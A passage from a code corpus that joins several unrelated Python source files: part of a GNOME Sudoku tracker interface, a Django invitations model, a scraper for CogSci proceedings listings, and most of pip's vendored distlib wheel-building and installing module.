cell.set_property('weight', Pango.Weight.BOLD)
else:
cell.set_property('weight', Pango.Weight.NORMAL)
@simple_debug
def add_tracker (self, *args, **keys):
if keys and keys.has_key('tracker_id'):
tracker_id = self.tinfo.create_tracker(keys['tracker_id'])
else:
tracker_id = self.tinfo.create_tracker()
pixbuf = self.get_tracker_pixbuf(
self.tinfo.get_color(tracker_id)
)
# select our new tracker
self.tracker_tree.get_selection().select_iter(
self.tracker_model.append([tracker_id,
pixbuf,
_("Tracker %s") % (tracker_id + 1)]
)
)
self.tinfo.set_tracker(tracker_id)
@simple_debug
def get_tracker_pixbuf (self, color):
surface = cairo.ImageSurface (cairo.FORMAT_ARGB32, 64, 64)
cr = cairo.Context(surface)
cr.set_source_rgb(*color);
cr.mask_surface(self.footprint_img, 0, 0)
cr.fill()
return Gdk.pixbuf_get_from_surface(surface, 0, 0, 64, 64)
@simple_debug
def find_tracker (self, tracker_id):
for row in self.tracker_model:
if row[0] == tracker_id:
return row
return None
@simple_debug
def select_tracker (self, tracker_id):
track_row = self.find_tracker(tracker_id)
if track_row:
self.tracker_tree.get_selection().select_iter(track_row.iter)
self.tinfo.set_tracker(tracker_id)
def redraw_row(self, tracker_id):
track_row = self.find_tracker(tracker_id)
if track_row:
self.tracker_model.row_changed(self.tracker_model.get_path(track_row.iter), track_row.iter)
def set_tracker_action_sense(self, enabled):
self.tracker_actions.set_sensitive(True)
for action in self.tracker_actions.list_actions():
action.set_sensitive(self.tinfo.showing_tracker != tracker_info.NO_TRACKER)
@simple_debug
def selection_changed_cb (self, selection, user_data=None):
mod, itr = selection.get_selected()
if itr:
selected_tracker_id = mod.get_value(itr, 0)
else:
selected_tracker_id = tracker_info.NO_TRACKER
if selected_tracker_id != tracker_info.NO_TRACKER:
self.main_ui.gsd.cover_track()
# Remove the underline on the showing_tracker
self.redraw_row(self.tinfo.showing_tracker)
self.tinfo.set_tracker(selected_tracker_id)
self.set_tracker_action_sense(self.tinfo.showing_tracker != tracker_info.NO_TRACKER)
# Show the tracker
if selected_tracker_id != tracker_info.NO_TRACKER:
self.main_ui.gsd.show_track()
self.main_ui.gsd.update_all_notes()
if self.main_ui.gconf['always_show_hints']:
self.main_ui.gsd.update_all_hints()
@simple_debug
def remove_tracker_cb (self, action, user_data=None):
mod, itr = self.tracker_tree.get_selection().get_selected()
# This should only be called if there is an itr, but we'll
# double-check just in case.
if itr:
clearer = Undo.UndoableObject(
self.do_delete_tracker,
self.undo_delete_tracker,
self.main_ui.history
)
clearer.perform()
@simple_debug
def hide_tracker_cb (self, action, user_data=None):
hiding_tracker = self.tinfo.showing_tracker
self.select_tracker(tracker_info.NO_TRACKER)
self.main_ui.gsd.cover_track(True)
self.main_ui.gsd.update_all_notes()
self.set_tracker_action_sense(False)
self.redraw_row(hiding_tracker)
self.redraw_row(tracker_info.NO_TRACKER)
@simple_debug
def apply_tracker_cb (self, action, user_data=None):
'''Apply Tracker button action
'''
# Shouldn't be here if no tracker is showing
if self.tinfo.showing_tracker == tracker_info.NO_TRACKER:
return
# Apply the tracker in undo-able fashion
applyer = Undo.UndoableObject(
self.do_apply_tracker,
self.undo_apply_tracker,
self.main_ui.history
)
applyer.perform()
def do_apply_tracker(self):
'''Apply the showing tracker to untracked
All of the values and notes will be transferred to untracked and
the tracker is deleted.
'''
track_row = self.find_tracker(self.tinfo.showing_tracker)
if not track_row:
return
# Delete the tracker
cleared_values, cleared_notes = self.do_delete_tracker(True)
# Apply the values
for x, y, val, tid in cleared_values:
self.main_ui.gsd.set_value(x, y, val)
# Then apply the notes
self.main_ui.gsd.apply_notelist(cleared_notes, True)
# Store the undo counts
self.main_ui.cleared.append(len(cleared_values))
self.main_ui.cleared_notes.append(len(cleared_notes))
def undo_apply_tracker(self):
'''Undo a previous tracker apply
The number of cleared values and notes are stored during the apply.
The undo is called for each of them, then the tracker delete is
undone.
'''
# Undo all of the applied values and notes
value_count = self.main_ui.cleared.pop()
note_count = self.main_ui.cleared_notes.pop()
count = 0
while count < (value_count + note_count):
self.main_ui.history.undo()
count += 1
# Undo the tracker delete
self.undo_delete_tracker()
def do_delete_tracker(self, for_apply = False):
'''Delete the current tracker
'''
track_row = self.find_tracker(self.tinfo.showing_tracker)
if not track_row:
return
ui_row = [track_row[0], track_row[1], track_row[2]]
# For the values, store it like (tracker_id, list_of_cleared_values)
cleared_values = self.main_ui.gsd.delete_by_tracker()
self.main_ui.cleared.append((self.tinfo.showing_tracker, ui_row, cleared_values))
# The notes already have tracker info in them, so just store the list
cleared_notes = self.main_ui.gsd.clear_notes(tracker = self.tinfo.showing_tracker)
self.main_ui.cleared_notes.append(cleared_notes)
# Delete it from tracker_info
self.hide_tracker_cb(None)
self.tracker_model.remove(track_row.iter)
self.tinfo.delete_tracker(ui_row[0])
# Return all of the data for "Apply Tracker" button
if for_apply:
return (cleared_values, cleared_notes)
def undo_delete_tracker(self):
'''Undo a tracker delete
'''
# Values are stored like (tracker_id, list_of_cleared_values)
tracker_id, ui_row, cleared_values = self.main_ui.cleared.pop()
# Recreate it in tracker_info
self.tinfo.create_tracker(tracker_id)
# Add it to the tree
self.tracker_tree.get_selection().select_iter(self.tracker_model.append(ui_row))
# Add all the values
for value in cleared_values:
self.main_ui.gsd.add_value(*value)
# The notes already have tracker info in them, so just store the list
self.main_ui.gsd.apply_notelist(self.main_ui.cleared_notes.pop())
def start_game ():
if options.debug:
print 'Starting GNOME Sudoku in debug mode'
## You must call g_thread_init() before executing any other GLib
## functions in a threaded GLib program.
GObject.threads_init()
if options.profile:
options.profile = False
profile_me()
return
u = UI()
if not u.quit:
try:
Gtk.main()
except KeyboardInterrupt:
# properly quit on a keyboard interrupt...
u.quit_cb()
def profile_me ():
print 'Profiling GNOME Sudoku'
import tempfile, hotshot, hotshot.stats
pname = os.path.join(tempfile.gettempdir(), 'GNOME_SUDOKU_HOTSHOT_PROFILE')
prof = hotshot.Profile(pname)
prof.runcall(start_game)
stats = hotshot.stats.load(pname)
stats.strip_dirs()
stats.sort_stats('time', 'calls').print_stats()
| gpl-3.0 |
emorozov/django-basic-apps | basic/invitations/models.py | 10 | 2238 | import random
from django.db import models
from django.contrib.auth.models import User
from django.conf import settings
from django.contrib.sites.models import Site
from django.utils.hashcompat import sha_constructor
INVITATION_ALLOTMENT = getattr(settings, 'INVITATION_ALLOTMENT', 5)
INVITATION_STATUS_SENT = 0
INVITATION_STATUS_ACCEPTED = 1
INVITATION_STATUS_DECLINED = 2
INVITATION_STATUS_CHOICES = (
(INVITATION_STATUS_SENT, 'Sent'),
(INVITATION_STATUS_DECLINED, 'Accepted'),
(INVITATION_STATUS_DECLINED, 'Declined'),
)
class InvitationManager(models.Manager):
def get_invitation(self, token):
try:
return self.get(token=token, status=INVITATION_STATUS_SENT)
except self.model.DoesNotExist:
return False
def create_token(self, email):
salt = sha_constructor(str(random.random())).hexdigest()[:5]
token = sha_constructor(salt+email).hexdigest()
return token
class Invitation(models.Model):
""" Invitation model """
from_user = models.ForeignKey(User)
token = models.CharField(max_length=40)
name = models.CharField(blank=True, max_length=100)
email = models.EmailField()
message = models.TextField(blank=True)
status = models.PositiveSmallIntegerField(choices=INVITATION_STATUS_CHOICES, default=0)
site = models.ForeignKey(Site, default=settings.SITE_ID)
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
objects = InvitationManager()
def __unicode__(self):
return '<Invite>'
@models.permalink
def get_absolute_url(self):
return ('invitations:invitation', [self.token])
class InvitationAllotment(models.Model):
""" InvitationAllotment model """
user = models.OneToOneField(User, related_name='invitation_allotment')
amount = models.IntegerField(default=INVITATION_ALLOTMENT)
site = models.ForeignKey(Site, default=settings.SITE_ID)
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
def __unicode__(self):
return '<Invitation Allotment>'
def decrement(self, amount=1):
self.amount = self.amount - amount
self.save()
| bsd-3-clause |
jhamrick/cogsci-proceedings-analysis | scraper.py | 1 | 2997 | import urllib2
import pandas as pd
from bs4 import BeautifulSoup, element
def load_html(url):
response = urllib2.urlopen(url)
html = response.read().replace(" ", "")
return html
def get_papers_table(year):
url = "https://mindmodeling.org/cogsci{}/".format(year)
soup = BeautifulSoup(load_html(url))
tables = soup.find_all("table")
tds = tables[5].find_all("td")
tds = [td for td in tds if len(td.contents) > 0]
paper_type = None
papers = []
paper = {}
for td in tds:
elem = td.contents[0]
if isinstance(elem, element.NavigableString):
paper['authors'] = unicode(elem)
paper['year'] = year
paper['section'] = paper_type
papers.append(paper)
paper = {}
elif elem.name == 'a':
href = url + elem.attrs['href']
title = "".join(elem.contents)
paper['url'] = href
paper['title'] = title
elif elem.name == 'h2':
section_name, = elem.contents
paper_type = section_name.strip()
return pd.DataFrame(papers)
def get_papers_list(year):
url = "https://mindmodeling.org/cogsci{}/".format(year)
html = load_html(url)
html = html.replace("<li>", "").replace("<li id=session>", "")
soup = BeautifulSoup(html)
papers = []
paper = {}
paper_type = None
for elem in soup.findAll("a"):
if not isinstance(elem.contents[0], element.NavigableString):
continue
sibling = elem.findNextSibling()
if not hasattr(sibling, "name"):
continue
if sibling.name != "ul":
continue
toplevel = elem.findParent().findParent()
break
for section in toplevel.contents:
if isinstance(section, element.NavigableString):
paper_type = section.strip()
continue
for elem in section.find_all("a"):
href = url + elem.attrs['href']
try:
title = "".join(elem.contents)
except TypeError:
continue
paper = {}
paper['year'] = year
paper['url'] = href
paper['title'] = title
paper['section'] = paper_type
sibling = elem.findNextSibling()
authors, = sibling.contents
paper['authors'] = unicode(authors)
papers.append(paper)
return pd.DataFrame(papers)
def get_papers():
papers = pd.concat([
get_papers_table(2014),
get_papers_list(2013),
get_papers_list(2012),
get_papers_list(2011),
get_papers_list(2010)
])
papers = papers\
.set_index('url')\
.sort()
if papers.isnull().any().any():
raise RuntimeError("some entries are null")
return papers
if __name__ == "__main__":
pathname = "cogsci_proceedings_raw.csv"
papers = get_papers()
papers.to_csv(pathname, encoding='utf-8')
| mit |
xyuanmu/XX-Net | python3.8.2/Lib/site-packages/pip/_vendor/distlib/wheel.py | 17 | 40437 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013-2017 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
from __future__ import unicode_literals
import base64
import codecs
import datetime
import distutils.util
from email import message_from_file
import hashlib
import imp
import json
import logging
import os
import posixpath
import re
import shutil
import sys
import tempfile
import zipfile
from . import __version__, DistlibException
from .compat import sysconfig, ZipFile, fsdecode, text_type, filter
from .database import InstalledDistribution
from .metadata import Metadata, METADATA_FILENAME, WHEEL_METADATA_FILENAME
from .util import (FileOperator, convert_path, CSVReader, CSVWriter, Cache,
cached_property, get_cache_base, read_exports, tempdir)
from .version import NormalizedVersion, UnsupportedVersionError
logger = logging.getLogger(__name__)
cache = None # created when needed
if hasattr(sys, 'pypy_version_info'): # pragma: no cover
IMP_PREFIX = 'pp'
elif sys.platform.startswith('java'): # pragma: no cover
IMP_PREFIX = 'jy'
elif sys.platform == 'cli': # pragma: no cover
IMP_PREFIX = 'ip'
else:
IMP_PREFIX = 'cp'
VER_SUFFIX = sysconfig.get_config_var('py_version_nodot')
if not VER_SUFFIX: # pragma: no cover
VER_SUFFIX = '%s%s' % sys.version_info[:2]
PYVER = 'py' + VER_SUFFIX
IMPVER = IMP_PREFIX + VER_SUFFIX
ARCH = distutils.util.get_platform().replace('-', '_').replace('.', '_')
ABI = sysconfig.get_config_var('SOABI')
if ABI and ABI.startswith('cpython-'):
ABI = ABI.replace('cpython-', 'cp')
else:
def _derive_abi():
parts = ['cp', VER_SUFFIX]
if sysconfig.get_config_var('Py_DEBUG'):
parts.append('d')
if sysconfig.get_config_var('WITH_PYMALLOC'):
parts.append('m')
if sysconfig.get_config_var('Py_UNICODE_SIZE') == 4:
parts.append('u')
return ''.join(parts)
ABI = _derive_abi()
del _derive_abi
FILENAME_RE = re.compile(r'''
(?P<nm>[^-]+)
-(?P<vn>\d+[^-]*)
(-(?P<bn>\d+[^-]*))?
-(?P<py>\w+\d+(\.\w+\d+)*)
-(?P<bi>\w+)
-(?P<ar>\w+(\.\w+)*)
\.whl$
''', re.IGNORECASE | re.VERBOSE)
NAME_VERSION_RE = re.compile(r'''
(?P<nm>[^-]+)
-(?P<vn>\d+[^-]*)
(-(?P<bn>\d+[^-]*))?$
''', re.IGNORECASE | re.VERBOSE)
SHEBANG_RE = re.compile(br'\s*#![^\r\n]*')
SHEBANG_DETAIL_RE = re.compile(br'^(\s*#!("[^"]+"|\S+))\s+(.*)$')
SHEBANG_PYTHON = b'#!python'
SHEBANG_PYTHONW = b'#!pythonw'
if os.sep == '/':
to_posix = lambda o: o
else:
to_posix = lambda o: o.replace(os.sep, '/')
class Mounter(object):
def __init__(self):
self.impure_wheels = {}
self.libs = {}
def add(self, pathname, extensions):
self.impure_wheels[pathname] = extensions
self.libs.update(extensions)
def remove(self, pathname):
extensions = self.impure_wheels.pop(pathname)
for k, v in extensions:
if k in self.libs:
del self.libs[k]
def find_module(self, fullname, path=None):
if fullname in self.libs:
result = self
else:
result = None
return result
def load_module(self, fullname):
if fullname in sys.modules:
result = sys.modules[fullname]
else:
if fullname not in self.libs:
raise ImportError('unable to find extension for %s' % fullname)
result = imp.load_dynamic(fullname, self.libs[fullname])
result.__loader__ = self
parts = fullname.rsplit('.', 1)
if len(parts) > 1:
result.__package__ = parts[0]
return result
_hook = Mounter()
class Wheel(object):
"""
Class to build and install from Wheel files (PEP 427).
"""
wheel_version = (1, 1)
hash_kind = 'sha256'
def __init__(self, filename=None, sign=False, verify=False):
"""
Initialise an instance using a (valid) filename.
"""
self.sign = sign
self.should_verify = verify
self.buildver = ''
self.pyver = [PYVER]
self.abi = ['none']
self.arch = ['any']
self.dirname = os.getcwd()
if filename is None:
self.name = 'dummy'
self.version = '0.1'
self._filename = self.filename
else:
m = NAME_VERSION_RE.match(filename)
if m:
info = m.groupdict('')
self.name = info['nm']
# Reinstate the local version separator
self.version = info['vn'].replace('_', '-')
self.buildver = info['bn']
self._filename = self.filename
else:
dirname, filename = os.path.split(filename)
m = FILENAME_RE.match(filename)
if not m:
raise DistlibException('Invalid name or '
'filename: %r' % filename)
if dirname:
self.dirname = os.path.abspath(dirname)
self._filename = filename
info = m.groupdict('')
self.name = info['nm']
self.version = info['vn']
self.buildver = info['bn']
self.pyver = info['py'].split('.')
self.abi = info['bi'].split('.')
self.arch = info['ar'].split('.')
@property
def filename(self):
"""
Build and return a filename from the various components.
"""
if self.buildver:
buildver = '-' + self.buildver
else:
buildver = ''
pyver = '.'.join(self.pyver)
abi = '.'.join(self.abi)
arch = '.'.join(self.arch)
# replace - with _ as a local version separator
version = self.version.replace('-', '_')
return '%s-%s%s-%s-%s-%s.whl' % (self.name, version, buildver,
pyver, abi, arch)
@property
def exists(self):
path = os.path.join(self.dirname, self.filename)
return os.path.isfile(path)
@property
def tags(self):
for pyver in self.pyver:
for abi in self.abi:
for arch in self.arch:
yield pyver, abi, arch
@cached_property
def metadata(self):
pathname = os.path.join(self.dirname, self.filename)
name_ver = '%s-%s' % (self.name, self.version)
info_dir = '%s.dist-info' % name_ver
wrapper = codecs.getreader('utf-8')
with ZipFile(pathname, 'r') as zf:
wheel_metadata = self.get_wheel_metadata(zf)
wv = wheel_metadata['Wheel-Version'].split('.', 1)
file_version = tuple([int(i) for i in wv])
if file_version < (1, 1):
fns = [WHEEL_METADATA_FILENAME, METADATA_FILENAME, 'METADATA']
else:
fns = [WHEEL_METADATA_FILENAME, METADATA_FILENAME]
result = None
for fn in fns:
try:
metadata_filename = posixpath.join(info_dir, fn)
with zf.open(metadata_filename) as bf:
wf = wrapper(bf)
result = Metadata(fileobj=wf)
if result:
break
except KeyError:
pass
if not result:
raise ValueError('Invalid wheel, because metadata is '
'missing: looked in %s' % ', '.join(fns))
return result
def get_wheel_metadata(self, zf):
name_ver = '%s-%s' % (self.name, self.version)
info_dir = '%s.dist-info' % name_ver
metadata_filename = posixpath.join(info_dir, 'WHEEL')
with zf.open(metadata_filename) as bf:
wf = codecs.getreader('utf-8')(bf)
message = message_from_file(wf)
return dict(message)
@cached_property
def info(self):
pathname = os.path.join(self.dirname, self.filename)
with ZipFile(pathname, 'r') as zf:
result = self.get_wheel_metadata(zf)
return result
def process_shebang(self, data):
m = SHEBANG_RE.match(data)
if m:
end = m.end()
shebang, data_after_shebang = data[:end], data[end:]
# Preserve any arguments after the interpreter
if b'pythonw' in shebang.lower():
shebang_python = SHEBANG_PYTHONW
else:
shebang_python = SHEBANG_PYTHON
m = SHEBANG_DETAIL_RE.match(shebang)
if m:
args = b' ' + m.groups()[-1]
else:
args = b''
shebang = shebang_python + args
data = shebang + data_after_shebang
else:
cr = data.find(b'\r')
lf = data.find(b'\n')
if cr < 0 or cr > lf:
term = b'\n'
else:
if data[cr:cr + 2] == b'\r\n':
term = b'\r\n'
else:
term = b'\r'
data = SHEBANG_PYTHON + term + data
return data
def get_hash(self, data, hash_kind=None):
if hash_kind is None:
hash_kind = self.hash_kind
try:
hasher = getattr(hashlib, hash_kind)
except AttributeError:
raise DistlibException('Unsupported hash algorithm: %r' % hash_kind)
result = hasher(data).digest()
result = base64.urlsafe_b64encode(result).rstrip(b'=').decode('ascii')
return hash_kind, result
def write_record(self, records, record_path, base):
records = list(records) # make a copy for sorting
p = to_posix(os.path.relpath(record_path, base))
records.append((p, '', ''))
records.sort()
with CSVWriter(record_path) as writer:
for row in records:
writer.writerow(row)
def write_records(self, info, libdir, archive_paths):
records = []
distinfo, info_dir = info
hasher = getattr(hashlib, self.hash_kind)
for ap, p in archive_paths:
with open(p, 'rb') as f:
data = f.read()
digest = '%s=%s' % self.get_hash(data)
size = os.path.getsize(p)
records.append((ap, digest, size))
p = os.path.join(distinfo, 'RECORD')
self.write_record(records, p, libdir)
ap = to_posix(os.path.join(info_dir, 'RECORD'))
archive_paths.append((ap, p))
def build_zip(self, pathname, archive_paths):
with ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED) as zf:
for ap, p in archive_paths:
logger.debug('Wrote %s to %s in wheel', p, ap)
zf.write(p, ap)
def build(self, paths, tags=None, wheel_version=None):
"""
Build a wheel from files in specified paths, and use any specified tags
when determining the name of the wheel.
"""
if tags is None:
tags = {}
libkey = list(filter(lambda o: o in paths, ('purelib', 'platlib')))[0]
if libkey == 'platlib':
is_pure = 'false'
default_pyver = [IMPVER]
default_abi = [ABI]
default_arch = [ARCH]
else:
is_pure = 'true'
default_pyver = [PYVER]
default_abi = ['none']
default_arch = ['any']
self.pyver = tags.get('pyver', default_pyver)
self.abi = tags.get('abi', default_abi)
self.arch = tags.get('arch', default_arch)
libdir = paths[libkey]
name_ver = '%s-%s' % (self.name, self.version)
data_dir = '%s.data' % name_ver
info_dir = '%s.dist-info' % name_ver
archive_paths = []
# First, stuff which is not in site-packages
for key in ('data', 'headers', 'scripts'):
if key not in paths:
continue
path = paths[key]
if os.path.isdir(path):
for root, dirs, files in os.walk(path):
for fn in files:
p = fsdecode(os.path.join(root, fn))
rp = os.path.relpath(p, path)
ap = to_posix(os.path.join(data_dir, key, rp))
archive_paths.append((ap, p))
if key == 'scripts' and not p.endswith('.exe'):
with open(p, 'rb') as f:
data = f.read()
data = self.process_shebang(data)
with open(p, 'wb') as f:
f.write(data)
# Now, stuff which is in site-packages, other than the
# distinfo stuff.
path = libdir
distinfo = None
for root, dirs, files in os.walk(path):
if root == path:
# At the top level only, save distinfo for later
# and skip it for now
for i, dn in enumerate(dirs):
dn = fsdecode(dn)
if dn.endswith('.dist-info'):
distinfo = os.path.join(root, dn)
del dirs[i]
break
assert distinfo, '.dist-info directory expected, not found'
for fn in files:
# comment out next suite to leave .pyc files in
if fsdecode(fn).endswith(('.pyc', '.pyo')):
continue
p = os.path.join(root, fn)
rp = to_posix(os.path.relpath(p, path))
archive_paths.append((rp, p))
# Now distinfo. Assumed to be flat, i.e. os.listdir is enough.
files = os.listdir(distinfo)
for fn in files:
if fn not in ('RECORD', 'INSTALLER', 'SHARED', 'WHEEL'):
p = fsdecode(os.path.join(distinfo, fn))
ap = to_posix(os.path.join(info_dir, fn))
archive_paths.append((ap, p))
wheel_metadata = [
'Wheel-Version: %d.%d' % (wheel_version or self.wheel_version),
'Generator: distlib %s' % __version__,
'Root-Is-Purelib: %s' % is_pure,
]
for pyver, abi, arch in self.tags:
wheel_metadata.append('Tag: %s-%s-%s' % (pyver, abi, arch))
p = os.path.join(distinfo, 'WHEEL')
with open(p, 'w') as f:
f.write('\n'.join(wheel_metadata))
ap = to_posix(os.path.join(info_dir, 'WHEEL'))
archive_paths.append((ap, p))
# Now, at last, RECORD.
# Paths in here are archive paths - nothing else makes sense.
self.write_records((distinfo, info_dir), libdir, archive_paths)
# Now, ready to build the zip file
pathname = os.path.join(self.dirname, self.filename)
self.build_zip(pathname, archive_paths)
return pathname
def skip_entry(self, arcname):
"""
Determine whether an archive entry should be skipped when verifying
or installing.
"""
# The signature file won't be in RECORD,
# and we don't currently don't do anything with it
# We also skip directories, as they won't be in RECORD
# either. See:
#
# https://github.com/pypa/wheel/issues/294
# https://github.com/pypa/wheel/issues/287
# https://github.com/pypa/wheel/pull/289
#
return arcname.endswith(('/', '/RECORD.jws'))
def install(self, paths, maker, **kwargs):
"""
Install a wheel to the specified paths. If kwarg ``warner`` is
specified, it should be a callable, which will be called with two
tuples indicating the wheel version of this software and the wheel
version in the file, if there is a discrepancy in the versions.
This can be used to issue any warnings to raise any exceptions.
If kwarg ``lib_only`` is True, only the purelib/platlib files are
installed, and the headers, scripts, data and dist-info metadata are
not written. If kwarg ``bytecode_hashed_invalidation`` is True, written
bytecode will try to use file-hash based invalidation (PEP-552) on
supported interpreter versions (CPython 2.7+).
The return value is a :class:`InstalledDistribution` instance unless
``options.lib_only`` is True, in which case the return value is ``None``.
"""
dry_run = maker.dry_run
warner = kwargs.get('warner')
lib_only = kwargs.get('lib_only', False)
bc_hashed_invalidation = kwargs.get('bytecode_hashed_invalidation', False)
pathname = os.path.join(self.dirname, self.filename)
name_ver = '%s-%s' % (self.name, self.version)
data_dir = '%s.data' % name_ver
info_dir = '%s.dist-info' % name_ver
metadata_name = posixpath.join(info_dir, METADATA_FILENAME)
wheel_metadata_name = posixpath.join(info_dir, 'WHEEL')
record_name = posixpath.join(info_dir, 'RECORD')
wrapper = codecs.getreader('utf-8')
with ZipFile(pathname, 'r') as zf:
with zf.open(wheel_metadata_name) as bwf:
wf = wrapper(bwf)
message = message_from_file(wf)
wv = message['Wheel-Version'].split('.', 1)
file_version = tuple([int(i) for i in wv])
if (file_version != self.wheel_version) and warner:
warner(self.wheel_version, file_version)
if message['Root-Is-Purelib'] == 'true':
libdir = paths['purelib']
else:
libdir = paths['platlib']
records = {}
with zf.open(record_name) as bf:
with CSVReader(stream=bf) as reader:
for row in reader:
p = row[0]
records[p] = row
data_pfx = posixpath.join(data_dir, '')
info_pfx = posixpath.join(info_dir, '')
script_pfx = posixpath.join(data_dir, 'scripts', '')
# make a new instance rather than a copy of maker's,
# as we mutate it
fileop = FileOperator(dry_run=dry_run)
fileop.record = True # so we can rollback if needed
bc = not sys.dont_write_bytecode # Double negatives. Lovely!
outfiles = [] # for RECORD writing
# for script copying/shebang processing
workdir = tempfile.mkdtemp()
# set target dir later
# we default add_launchers to False, as the
# Python Launcher should be used instead
maker.source_dir = workdir
maker.target_dir = None
try:
for zinfo in zf.infolist():
arcname = zinfo.filename
if isinstance(arcname, text_type):
u_arcname = arcname
else:
u_arcname = arcname.decode('utf-8')
if self.skip_entry(u_arcname):
continue
row = records[u_arcname]
if row[2] and str(zinfo.file_size) != row[2]:
raise DistlibException('size mismatch for '
'%s' % u_arcname)
if row[1]:
kind, value = row[1].split('=', 1)
with zf.open(arcname) as bf:
data = bf.read()
_, digest = self.get_hash(data, kind)
if digest != value:
raise DistlibException('digest mismatch for '
'%s' % arcname)
if lib_only and u_arcname.startswith((info_pfx, data_pfx)):
logger.debug('lib_only: skipping %s', u_arcname)
continue
is_script = (u_arcname.startswith(script_pfx)
and not u_arcname.endswith('.exe'))
if u_arcname.startswith(data_pfx):
_, where, rp = u_arcname.split('/', 2)
outfile = os.path.join(paths[where], convert_path(rp))
else:
# meant for site-packages.
if u_arcname in (wheel_metadata_name, record_name):
continue
outfile = os.path.join(libdir, convert_path(u_arcname))
if not is_script:
with zf.open(arcname) as bf:
fileop.copy_stream(bf, outfile)
outfiles.append(outfile)
# Double check the digest of the written file
if not dry_run and row[1]:
with open(outfile, 'rb') as bf:
data = bf.read()
_, newdigest = self.get_hash(data, kind)
if newdigest != digest:
raise DistlibException('digest mismatch '
'on write for '
'%s' % outfile)
if bc and outfile.endswith('.py'):
try:
pyc = fileop.byte_compile(outfile,
hashed_invalidation=bc_hashed_invalidation)
outfiles.append(pyc)
except Exception:
# Don't give up if byte-compilation fails,
# but log it and perhaps warn the user
logger.warning('Byte-compilation failed',
exc_info=True)
else:
fn = os.path.basename(convert_path(arcname))
workname = os.path.join(workdir, fn)
with zf.open(arcname) as bf:
fileop.copy_stream(bf, workname)
dn, fn = os.path.split(outfile)
maker.target_dir = dn
filenames = maker.make(fn)
fileop.set_executable_mode(filenames)
outfiles.extend(filenames)
if lib_only:
logger.debug('lib_only: returning None')
dist = None
else:
# Generate scripts
# Try to get pydist.json so we can see if there are
# any commands to generate. If this fails (e.g. because
# of a legacy wheel), log a warning but don't give up.
commands = None
file_version = self.info['Wheel-Version']
if file_version == '1.0':
# Use legacy info
ep = posixpath.join(info_dir, 'entry_points.txt')
try:
with zf.open(ep) as bwf:
epdata = read_exports(bwf)
commands = {}
for key in ('console', 'gui'):
k = '%s_scripts' % key
if k in epdata:
commands['wrap_%s' % key] = d = {}
for v in epdata[k].values():
s = '%s:%s' % (v.prefix, v.suffix)
if v.flags:
s += ' %s' % v.flags
d[v.name] = s
except Exception:
logger.warning('Unable to read legacy script '
'metadata, so cannot generate '
'scripts')
else:
try:
with zf.open(metadata_name) as bwf:
wf = wrapper(bwf)
commands = json.load(wf).get('extensions')
if commands:
commands = commands.get('python.commands')
except Exception:
logger.warning('Unable to read JSON metadata, so '
'cannot generate scripts')
if commands:
console_scripts = commands.get('wrap_console', {})
gui_scripts = commands.get('wrap_gui', {})
if console_scripts or gui_scripts:
script_dir = paths.get('scripts', '')
if not os.path.isdir(script_dir):
raise ValueError('Valid script path not '
'specified')
maker.target_dir = script_dir
for k, v in console_scripts.items():
script = '%s = %s' % (k, v)
filenames = maker.make(script)
fileop.set_executable_mode(filenames)
if gui_scripts:
options = {'gui': True }
for k, v in gui_scripts.items():
script = '%s = %s' % (k, v)
filenames = maker.make(script, options)
fileop.set_executable_mode(filenames)
p = os.path.join(libdir, info_dir)
dist = InstalledDistribution(p)
# Write SHARED
paths = dict(paths) # don't change passed in dict
del paths['purelib']
del paths['platlib']
paths['lib'] = libdir
p = dist.write_shared_locations(paths, dry_run)
if p:
outfiles.append(p)
# Write RECORD
dist.write_installed_files(outfiles, paths['prefix'],
dry_run)
return dist
except Exception: # pragma: no cover
logger.exception('installation failed.')
fileop.rollback()
raise
finally:
shutil.rmtree(workdir)
def _get_dylib_cache(self):
global cache
if cache is None:
# Use native string to avoid issues on 2.x: see Python #20140.
base = os.path.join(get_cache_base(), str('dylib-cache'),
sys.version[:3])
cache = Cache(base)
return cache
def _get_extensions(self):
pathname = os.path.join(self.dirname, self.filename)
name_ver = '%s-%s' % (self.name, self.version)
info_dir = '%s.dist-info' % name_ver
arcname = posixpath.join(info_dir, 'EXTENSIONS')
wrapper = codecs.getreader('utf-8')
result = []
with ZipFile(pathname, 'r') as zf:
try:
with zf.open(arcname) as bf:
wf = wrapper(bf)
extensions = json.load(wf)
cache = self._get_dylib_cache()
prefix = cache.prefix_to_dir(pathname)
cache_base = os.path.join(cache.base, prefix)
if not os.path.isdir(cache_base):
os.makedirs(cache_base)
for name, relpath in extensions.items():
dest = os.path.join(cache_base, convert_path(relpath))
if not os.path.exists(dest):
extract = True
else:
file_time = os.stat(dest).st_mtime
file_time = datetime.datetime.fromtimestamp(file_time)
info = zf.getinfo(relpath)
wheel_time = datetime.datetime(*info.date_time)
extract = wheel_time > file_time
if extract:
zf.extract(relpath, cache_base)
result.append((name, dest))
except KeyError:
pass
return result
def is_compatible(self):
"""
Determine if a wheel is compatible with the running system.
"""
return is_compatible(self)
def is_mountable(self):
"""
Determine if a wheel is asserted as mountable by its metadata.
"""
return True # for now - metadata details TBD
def mount(self, append=False):
pathname = os.path.abspath(os.path.join(self.dirname, self.filename))
if not self.is_compatible():
msg = 'Wheel %s not compatible with this Python.' % pathname
raise DistlibException(msg)
if not self.is_mountable():
msg = 'Wheel %s is marked as not mountable.' % pathname
raise DistlibException(msg)
if pathname in sys.path:
logger.debug('%s already in path', pathname)
else:
if append:
sys.path.append(pathname)
else:
sys.path.insert(0, pathname)
extensions = self._get_extensions()
if extensions:
if _hook not in sys.meta_path:
sys.meta_path.append(_hook)
_hook.add(pathname, extensions)
def unmount(self):
pathname = os.path.abspath(os.path.join(self.dirname, self.filename))
if pathname not in sys.path:
logger.debug('%s not in path', pathname)
else:
sys.path.remove(pathname)
if pathname in _hook.impure_wheels:
_hook.remove(pathname)
if not _hook.impure_wheels:
if _hook in sys.meta_path:
sys.meta_path.remove(_hook)
def verify(self):
pathname = os.path.join(self.dirname, self.filename)
name_ver = '%s-%s' % (self.name, self.version)
data_dir = '%s.data' % name_ver
info_dir = '%s.dist-info' % name_ver
metadata_name = posixpath.join(info_dir, METADATA_FILENAME)
wheel_metadata_name = posixpath.join(info_dir, 'WHEEL')
record_name = posixpath.join(info_dir, 'RECORD')
